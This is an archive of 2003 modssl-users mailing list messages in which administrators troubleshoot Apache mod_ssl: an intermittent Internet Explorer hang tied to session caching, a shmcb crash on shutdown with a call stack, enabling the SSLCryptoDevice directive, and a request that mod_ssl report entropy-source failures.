Received: from cus.org.uk (host213-106-240-81.no-dns-yet.ntli.net [213.106.240.81])
	by master.modssl.org (Postfix) with ESMTP id 29C972AA015
	for ; Tue,  4 Mar 2003 17:03:36 +0100 (CET)
Received: from cus.org.uk (localhost.cus.org.uk [127.0.0.1])
	by cus.org.uk (8.12.6/8.11.3) with ESMTP id h24G3W9M007193
	for ; Tue, 4 Mar 2003 16:03:32 GMT
	(envelope-from markb@cus.org.uk)
Received: from localhost (markb@localhost)
	by cus.org.uk (8.12.6/8.12.6/Submit) with ESMTP id h24G3WaQ007190
	for ; Tue, 4 Mar 2003 16:03:32 GMT
Date: Tue, 4 Mar 2003 16:03:32 +0000 (GMT)
From: Mark Boddington 
To: modssl-users@modssl.org
Subject: Re: intermittent IE problem
In-Reply-To: <20030304121358.J3032@cus.org.uk>
Message-ID: <20030304151430.F6089@cus.org.uk>
References: <20030304121358.J3032@cus.org.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Boddington 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Sorry I forgot to mention that I am also getting the following in the
ssl_engine log when IE disconnects:

[04/Mar/2003 15:00:16 04121] [info]  Connection to child 6 established
(server admin.netbanx.com:443, client 10.10.10.10)
[04/Mar/2003 15:00:16 04121] [info]  Seeding PRNG with 1160 bytes of
entropy
[04/Mar/2003 15:00:16 04121] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]

As you can see there are no errors apart from the handshake interrupt
caused by IE disconnecting from the server.

I think this issue may be something to do with the SSLSessionCache. If I
connect to the server and restart IE multiple times I get the page cannot
be displayed error within a few minutes. I'm using dbm for my cache, I'll
try switching to shm to see if that improves the situation.

Cheers,

Mark
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 17:44:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A3E222AA032; Tue,  4 Mar 2003 17:44:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dns.local.suitsyou.com (gso26-144-009.triad.rr.com [66.26.144.9])
	by master.modssl.org (Postfix) with ESMTP id A4E332AA015
	for ; Tue,  4 Mar 2003 17:44:14 +0100 (CET)
Received: from dns.local.suitsyou.com (IDENT:28249@localhost [127.0.0.1])
	by dns.local.suitsyou.com (8.12.6/8.12.4) with ESMTP id h24GiCAI017060
	for ; Tue, 4 Mar 2003 11:44:12 -0500
Received: (from jgelb@localhost)
	by dns.local.suitsyou.com (8.12.6/8.12.4/Submit) id h24GiCMP017059
	for modssl-users@modssl.org; Tue, 4 Mar 2003 11:44:12 -0500
Date: Tue, 4 Mar 2003 11:44:12 -0500
From: jgelb 
To: modssl-users@modssl.org
Subject: Re: intermittent IE problem
Message-ID: <20030304164412.GA13868@pearsoncmg.com>
References: <20030304121358.J3032@cus.org.uk> <20030304151430.F6089@cus.org.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030304151430.F6089@cus.org.uk>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jgelb 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Fwiw, I'm getting nearly identical symptoms as well.  After an
indeterminate amount of time, SSL requests to the server seem to hang
indefinitely.   The problem appears to temporarily clear itself for a
short time.

IE seems to trigger it frequently, but another person here has seen it
with Mozilla.

We've been using shm for our session cache.

Setting MaxRequestsPerChild to something low seems to have eased
things significantly, but not resolved them entirely.

Restarting the server clears the problem completely... for a little
while.

I've run with max SSL debugging and trussed the servers, but nothing
useful was logged... but, then again, I'm not sure what I'd be looking
for, and we can't trigger the symptoms at will.

Details:

solaris 2.8, apache 1.3.27, openssl 0.97a, mod_ssl-2.8.12-1.3.27

We've turned off keepalive and set ssl-unclean-shutdown for both MSIE
and Mozilla, set downgrade-1.0 and forceresponse-1.0 for MSIE, and are
running with the default SSLCipherSuite, except that Export56 is
disabled.


Thanks.

-- jeff







On Tue, Mar 04, 2003 at 04:03:32PM +0000, Mark Boddington wrote:
> 
> Sorry I forgot to mention that I am also getting the following in the
> ssl_engine log when IE disconnects:
> 
> [04/Mar/2003 15:00:16 04121] [info]  Connection to child 6 established
> (server admin.netbanx.com:443, client 10.10.10.10)
> [04/Mar/2003 15:00:16 04121] [info]  Seeding PRNG with 1160 bytes of
> entropy
> [04/Mar/2003 15:00:16 04121] [info]  Spurious SSL handshake
> interrupt[Hint: Usually just one of those OpenSSL confusions!?]
> 
> As you can see there are no errors apart from the handshake interrupt
> caused by IE disconnecting from the server.
> 
> I think this issue may be something to do with the SSLSessionCache. If I
> connect to the server and restart IE multiple times I get the page cannot
> be displayed error within a few minutes. I'm using dbm for my cache, I'll
> try switching to shm to see if that improves the situation.
> 
> Cheers,
> 
> Mark
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 17:51:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8BA92AA02E; Tue,  4 Mar 2003 17:51:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 527CF2AA015
	for ; Tue,  4 Mar 2003 17:51:37 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.202.196.90])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HB8009UNHIFEI@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Tue, 04 Mar 2003 11:51:51 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Tue,
 04 Mar 2003 11:51:34 -0500
Date: Tue, 04 Mar 2003 11:51:34 -0500
From: Geoff Thorpe 
Subject: Re: intermittent IE problem
In-reply-to: <20030304164412.GA13868@pearsoncmg.com>
To: modssl-users@modssl.org
Message-id: <20030304165134.GD1921@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <20030304121358.J3032@cus.org.uk> <20030304151430.F6089@cus.org.uk>
 <20030304164412.GA13868@pearsoncmg.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* jgelb (jgelb@pearsoncmg.com) wrote:

[snip]

> We've been using shm for our session cache.

Which one? shmht or shmcb?

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 18:01:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 041ED2AA02E; Tue,  4 Mar 2003 18:01:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dns.local.suitsyou.com (gso26-144-009.triad.rr.com [66.26.144.9])
	by master.modssl.org (Postfix) with ESMTP id 8F2182AA024
	for ; Tue,  4 Mar 2003 18:01:15 +0100 (CET)
Received: from dns.local.suitsyou.com (IDENT:28249@localhost [127.0.0.1])
	by dns.local.suitsyou.com (8.12.6/8.12.4) with ESMTP id h24H1EAI017183
	for ; Tue, 4 Mar 2003 12:01:14 -0500
Received: (from jgelb@localhost)
	by dns.local.suitsyou.com (8.12.6/8.12.4/Submit) id h24H1Djw017182
	for modssl-users@modssl.org; Tue, 4 Mar 2003 12:01:13 -0500
Date: Tue, 4 Mar 2003 12:01:13 -0500
From: jgelb 
To: modssl-users@modssl.org
Subject: Re: intermittent IE problem
Message-ID: <20030304170113.GB13868@pearsoncmg.com>
References: <20030304121358.J3032@cus.org.uk> <20030304151430.F6089@cus.org.uk> <20030304164412.GA13868@pearsoncmg.com> <20030304165134.GD1921@grumpy.geoffnet>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030304165134.GD1921@grumpy.geoffnet>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jgelb 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


smhcb

We've also done both file and sempahore based mutexes.

--jeff

On Tue, Mar 04, 2003 at 11:51:34AM -0500, Geoff Thorpe wrote:
> * jgelb (jgelb@pearsoncmg.com) wrote:
> 
> [snip]
> 
> > We've been using shm for our session cache.
> 
> Which one? shmht or shmcb?
> 
> Cheers,
> Geoff
> 
> -- 
> Geoff Thorpe
> geoff@geoffthorpe.net
> http://www.geoffthorpe.net/
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 18:04:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C7412AA02E; Tue,  4 Mar 2003 18:04:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay2-f77.bay2.hotmail.com [65.54.247.77])
	by master.modssl.org (Postfix) with ESMTP id 02D822AA015
	for ; Tue,  4 Mar 2003 18:04:04 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 4 Mar 2003 09:02:43 -0800
Received: from 156.153.254.10 by by2fd.bay2.hotmail.msn.com with HTTP;
	Tue, 04 Mar 2003 17:02:43 GMT
X-Originating-IP: [156.153.254.10]
From: "Edward Wong" 
To: modssl-users@modssl.org
Subject: shmcb access violation with openssl 0.9.6i
Date: Tue, 04 Mar 2003 09:02:43 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 04 Mar 2003 17:02:43.0094 (UTC) FILETIME=[DF08D360:01C2E26F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello All,

I've been able to consistantly reproduce a GPF on Apache service shutdown 
using Openssl 0.9.6i, and Apache 2.0.44.

Swapping to an older version of Openssl (0.9.6g) resolved the GPF.

To reproduce, simply download and build OpenSSL 0.9.6i and Apache 2.0.44.  
Be sure to configure ssl to use the shmcb ssl session caching.  Launch 
apache as a service and browse to the server using SSL.  Then try to stop 
the apache service.  During shutdown, Apache will GPF.

Oddly, if you don't browse to the webserver using SSL, Apache will not GPF 
on shutdown.

If it helps, the call stack looks as follows:

NTDLL! 77f51baa()
NTDLL! 77f7561d()
apr_file_write(apr_file_t * 0x005e91c8, const void * 0x0006dd6c, unsigned 
int * 0x0006dd58) line 316
apr_file_puts(const char * 0x0006dd6c, apr_file_t * 0x005e91c8) line 441
log_error_core(const char * 0x6fd1d948, int 117, int 4, int 720006, const 
server_rec * 0x00602700, const request_rec * 0x00000000, apr_pool_t * 
0x00000000, const char * 0x6fd1d924, char * 0x0006fdd0) line 543
ap_log_error(const char * 0x6fd1d948, int 117, int 4, int 720006, const 
server_rec * 0x00602700, const char * 0x6fd1d924) line 561 + 37 bytes
ssl_mutex_on(server_rec * 0x00602700) line 118 + 28 bytes
ssl_scache_shmcb_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8, 
int 32) line 476 + 9 bytes
ssl_scache_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8, int 
32) line 158 + 17 bytes
ssl_callback_DelSessionCacheEntry(ssl_ctx_st * 0x00645240, ssl_session_st * 
0x00689d90) line 1722 + 17 bytes
timeout(ssl_session_st * 0x00689d90, timeout_param_st * 0x0006fe6c) line 602 
+ 18 bytes
lh_doall_arg(lhash_st * 0x006453d0, void (void)* 0x1001a516 
timeout(ssl_session_st *, timeout_param_st *), void * 0x0006fe6c) line 290 + 
13 bytes
SSL_CTX_flush_sessions(ssl_ctx_st * 0x00645240, long 0) line 619 + 18 bytes
SSL_CTX_free(ssl_ctx_st * 0x00645240) line 1259 + 11 bytes
ssl_init_ctx_cleanup(modssl_ctx_t * 0x0064ef68) line 1197 + 21 bytes
ssl_init_ctx_cleanup_server(modssl_ctx_t * 0x0064ef68) line 1213 + 9 bytes
ssl_init_ModuleKill(void * 0x0030c458) line 1249 + 12 bytes
run_cleanups(cleanup_t * * 0x0030a5d0) line 1976 + 13 bytes
apr_pool_destroy(apr_pool_t * 0x0030a5c0) line 755 + 12 bytes
apr_pool_destroy(apr_pool_t * 0x00308588) line 752 + 12 bytes
destroy_and_exit_process(process_rec * 0x00308618, int 0) line 247
main(int 3, const char * const * 0x003024a8) line 658 + 11 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e814c7()

The error in log_error_core is:
[Mon Mar 03 12:43:04 2003] [warn] (OS 6)The handle is invalid.  : Failed to 
acquire global mutex lock.

Is this a known issue?  Is there something that I'm missing?  Other than 
changing from DBM to SHMCB, I have stock conf files.

Thanks in Advance,

************************************
Edward Wong
Connectivity Software

Hewlett-Packard Company
************************************




_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE*  
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 18:12:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D5A1E2AA02E; Tue,  4 Mar 2003 18:12:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id D7AF12AA015
	for ; Tue,  4 Mar 2003 18:12:12 +0100 (CET)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.9.3+Sun/8.9.2/UVACS-2000040300) with ESMTP id MAA18095
	for ; Tue, 4 Mar 2003 12:12:10 -0500 (EST)
Received: from localhost (jcw5q@localhost)
	by cobra.cs.Virginia.EDU (8.11.6+Sun/8.9.2) with ESMTP id h24HCAw04796
	for ; Tue, 4 Mar 2003 12:12:10 -0500 (EST)
X-Authentication-Warning: cobra.cs.Virginia.EDU: jcw5q owned process doing -bs
Date: Tue, 4 Mar 2003 12:12:10 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: Re: shmcb access violation with openssl 0.9.6i
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I've passed this on to the apache dev list.

--Cliff



On Tue, 4 Mar 2003, Edward Wong wrote:

> Hello All,
>
> I've been able to consistantly reproduce a GPF on Apache service shutdown
> using Openssl 0.9.6i, and Apache 2.0.44.
>
> Swapping to an older version of Openssl (0.9.6g) resolved the GPF.
>
> To reproduce, simply download and build OpenSSL 0.9.6i and Apache 2.0.44.
> Be sure to configure ssl to use the shmcb ssl session caching.  Launch
> apache as a service and browse to the server using SSL.  Then try to stop
> the apache service.  During shutdown, Apache will GPF.
>
> Oddly, if you don't browse to the webserver using SSL, Apache will not GPF
> on shutdown.
>
> If it helps, the call stack looks as follows:
>
> NTDLL! 77f51baa()
> NTDLL! 77f7561d()
> apr_file_write(apr_file_t * 0x005e91c8, const void * 0x0006dd6c, unsigned
> int * 0x0006dd58) line 316
> apr_file_puts(const char * 0x0006dd6c, apr_file_t * 0x005e91c8) line 441
> log_error_core(const char * 0x6fd1d948, int 117, int 4, int 720006, const
> server_rec * 0x00602700, const request_rec * 0x00000000, apr_pool_t *
> 0x00000000, const char * 0x6fd1d924, char * 0x0006fdd0) line 543
> ap_log_error(const char * 0x6fd1d948, int 117, int 4, int 720006, const
> server_rec * 0x00602700, const char * 0x6fd1d924) line 561 + 37 bytes
> ssl_mutex_on(server_rec * 0x00602700) line 118 + 28 bytes
> ssl_scache_shmcb_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8,
> int 32) line 476 + 9 bytes
> ssl_scache_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8, int
> 32) line 158 + 17 bytes
> ssl_callback_DelSessionCacheEntry(ssl_ctx_st * 0x00645240, ssl_session_st *
> 0x00689d90) line 1722 + 17 bytes
> timeout(ssl_session_st * 0x00689d90, timeout_param_st * 0x0006fe6c) line 602
> + 18 bytes
> lh_doall_arg(lhash_st * 0x006453d0, void (void)* 0x1001a516
> timeout(ssl_session_st *, timeout_param_st *), void * 0x0006fe6c) line 290 +
> 13 bytes
> SSL_CTX_flush_sessions(ssl_ctx_st * 0x00645240, long 0) line 619 + 18 bytes
> SSL_CTX_free(ssl_ctx_st * 0x00645240) line 1259 + 11 bytes
> ssl_init_ctx_cleanup(modssl_ctx_t * 0x0064ef68) line 1197 + 21 bytes
> ssl_init_ctx_cleanup_server(modssl_ctx_t * 0x0064ef68) line 1213 + 9 bytes
> ssl_init_ModuleKill(void * 0x0030c458) line 1249 + 12 bytes
> run_cleanups(cleanup_t * * 0x0030a5d0) line 1976 + 13 bytes
> apr_pool_destroy(apr_pool_t * 0x0030a5c0) line 755 + 12 bytes
> apr_pool_destroy(apr_pool_t * 0x00308588) line 752 + 12 bytes
> destroy_and_exit_process(process_rec * 0x00308618, int 0) line 247
> main(int 3, const char * const * 0x003024a8) line 658 + 11 bytes
> mainCRTStartup() line 338 + 17 bytes
> KERNEL32! 77e814c7()
>
> The error in log_error_core is:
> [Mon Mar 03 12:43:04 2003] [warn] (OS 6)The handle is invalid.  : Failed to
> acquire global mutex lock.
>
> Is this a known issue?  Is there something that I'm missing?  Other than
> changing from DBM to SHMCB, I have stock conf files.
>
> Thanks in Advance,
>
> ************************************
> Edward Wong
> Connectivity Software
>
> Hewlett-Packard Company
> ************************************
>
>
>
>
> _________________________________________________________________
> STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
> http://join.msn.com/?page=features/junkmail
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 01:12:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1DC812AA034; Wed,  5 Mar 2003 01:12:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from swiftview.com (mail.swiftview.com [66.239.248.180])
	by master.modssl.org (Postfix) with ESMTP id 760BF2AA01A
	for ; Wed,  5 Mar 2003 01:12:23 +0100 (CET)
Received: from mirage.swiftview.com ([192.168.0.78] verified)
  by swiftview.com (CommuniGate Pro SMTP 3.5.9)
  with ESMTP id 1122392 for modssl-users@modssl.org; Tue, 04 Mar 2003 16:12:21 -0800
Subject: SSLCryptoDevice Directive
From: Tyler Walden 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) 
Date: 04 Mar 2003 16:11:21 -0800
Message-Id: <1046823081.8026.220.camel@mirage.swiftview.com>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tyler Walden 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am attempting to get a CryptoSwift PCI harware accelerator engine
working with:

OpenSSL 0.9.7a
modssl 2.8.12
apache 1.3.27

When adding the 'SSLCryptoDevice cswift' line to my httpd.conf I receive
the following:

Starting httpd:  /opt/apache/bin/httpd -DPHP4 -DSSL  Syntax error on
line 1024 of /opt/apache/conf/httpd.conf:

Invalid command 'SSLCryptoDevice', perhaps mis-spelled or defined by a
module not included in the server configuration. I have tried placing
the directive in the global ssl options and in the 
and get the same error.

I assume that possibly apache is still using an older verison of mod_ssl
somehow. I know since openssl 0.9.7 the engine code is built in so you
don't need the --enable-rule=SSL_EXPERIMENTAL anymore or is that
incorrect?

Is there an easy way to determine what version of mod_ssl Apache is
actually loading?

Any help would be great! Thanx!

-- 
Tyler Walden
SwiftView, Inc.
Network Administrator
tyler@swiftview.com
(503)885-9392[126] voice
(503)885-9352 fax
http://www.swiftview.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 07:37:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C705F2AA034; Wed,  5 Mar 2003 07:37:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gamay.kronodoc.fi (gamay.kronodoc.fi [195.255.175.66])
	by master.modssl.org (Postfix) with ESMTP id 8404D2AA01A
	for ; Wed,  5 Mar 2003 07:37:38 +0100 (CET)
Received: by gamay.kronodoc.fi (Postfix, from userid 501)
	id 055F614033; Wed,  5 Mar 2003 08:37:32 +0200 (EET)
Received: from localhost (localhost [127.0.0.1])
	by gamay.kronodoc.fi (Postfix) with ESMTP id D9FA3240A9
	for ; Wed,  5 Mar 2003 08:37:32 +0200 (EET)
Date: Wed, 5 Mar 2003 08:37:32 +0200 (EET)
From: Marko Asplund 
To: modssl-users@modssl.org
Subject: handling entropy source failure [change request]
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marko Asplund 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


i'm running Apache/mod_ssl on platforms (HP-UX, Solaris) that don't come
with a good entropy source so i've configured mod_ssl to use PRNGD as the
entropy source. i've noticed that mod_ssl does not care whether input from
the configured entropy sources (SSLRandomSeed) succeeds. i think that this
can be a problem as the Apache administrator has no way of knowing whether
the configured entropy sources are actually used or not.

IMHO the default in the 'startup' context should be to exit with an error
exit status if an entropy source fails. a more backwards compatible option
might be to keep the current behaviour but add a new directive for
selecting the entropy source failure behaviour ('SSLRandomSeedFailOnError
on|off'). if an entropy source failure is detected in the 'connect'
context an error message should be printed in error_log.

best regards,
-- 
	aspa					http://www.kronodoc.fi/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 09:25:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A224B2AA034; Wed,  5 Mar 2003 09:25:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from th22.opsion.fr (th22.opsion.fr [62.39.122.32])
	by master.modssl.org (Postfix) with SMTP id A4D082AA01A
	for ; Wed,  5 Mar 2003 09:25:57 +0100 (CET)
Received: from 212.180.95.194 [212.180.95.194] by th22.opsion.fr id 200303050823.3a54; Wed, 5 Mar 2003 08:23:58 GMT
Message-ID: <3E65B4DF.1030008@ifrance.com>
Date: Wed, 05 Mar 2003 09:27:11 +0100
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLCryptoDevice Directive
References: <1046823081.8026.220.camel@mirage.swiftview.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

To know the version of mod_ssl running, you can read the logs at the 
apache startup, or do a connection with nc or telnet on your webserver 
and do a HEAD request. The server will answer sending the Server header 
with the server version.

You need the --enable-rule=SSL_EXPERIMENTAL The directive 
SSLCryptoDevice is provided by mod_ssl. without the SSL_EXPERIMENTAL 
rule, it doesn't provide the directive.
So you have to recompile mod_ssl with it.

regards,

Matthieu Estrade

Tyler Walden wrote:

>I am attempting to get a CryptoSwift PCI harware accelerator engine
>working with:
>
>OpenSSL 0.9.7a
>modssl 2.8.12
>apache 1.3.27
>
>When adding the 'SSLCryptoDevice cswift' line to my httpd.conf I receive
>the following:
>
>Starting httpd:  /opt/apache/bin/httpd -DPHP4 -DSSL  Syntax error on
>line 1024 of /opt/apache/conf/httpd.conf:
>
>Invalid command 'SSLCryptoDevice', perhaps mis-spelled or defined by a
>module not included in the server configuration. I have tried placing
>the directive in the global ssl options and in the 
>and get the same error.
>
>I assume that possibly apache is still using an older verison of mod_ssl
>somehow. I know since openssl 0.9.7 the engine code is built in so you
>don't need the --enable-rule=SSL_EXPERIMENTAL anymore or is that
>incorrect?
>
>Is there an easy way to determine what version of mod_ssl Apache is
>actually loading?
>
>Any help would be great! Thanx!
>
>  
>


_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? Télécharger MSN Messenger
http://www.ifrance.com/_reloc/m la 1ère messagerie instantanée de France

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 10:20:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D9E982AA034; Wed,  5 Mar 2003 10:20:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cus.org.uk (host213-106-240-81.no-dns-yet.ntli.net [213.106.240.81])
	by master.modssl.org (Postfix) with ESMTP id E2E6E2AA01A
	for ; Wed,  5 Mar 2003 10:20:42 +0100 (CET)
Received: from cus.org.uk (localhost.cus.org.uk [127.0.0.1])
	by cus.org.uk (8.12.6/8.11.3) with ESMTP id h259Kd9M022446
	for ; Wed, 5 Mar 2003 09:20:39 GMT
	(envelope-from markb@cus.org.uk)
Received: from localhost (markb@localhost)
	by cus.org.uk (8.12.6/8.12.6/Submit) with ESMTP id h259KdVa022443
	for ; Wed, 5 Mar 2003 09:20:39 GMT
Date: Wed, 5 Mar 2003 09:20:38 +0000 (GMT)
From: Mark Boddington 
To: modssl-users@modssl.org
Subject: Re: SSLCryptoDevice Directive
In-Reply-To: <1046823081.8026.220.camel@mirage.swiftview.com>
Message-ID: <20030305091130.P22340@cus.org.uk>
References: <1046823081.8026.220.camel@mirage.swiftview.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Boddington 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi,

On Wed, 4 Mar 2003, Tyler Walden wrote:

> I assume that possibly apache is still using an older verison of mod_ssl
> somehow. I know since openssl 0.9.7 the engine code is built in so you
> don't need the --enable-rule=SSL_EXPERIMENTAL anymore or is that
> incorrect?

The SSL_EXPERIMENTAL rule is an option to modSSL, not OpenSSL. You need to
enable it to use hardware crypto in modSSL. I built modSSL with this rule
enabled and my Ncipher Crypto module works fine. Your apache directive is
correct.

>
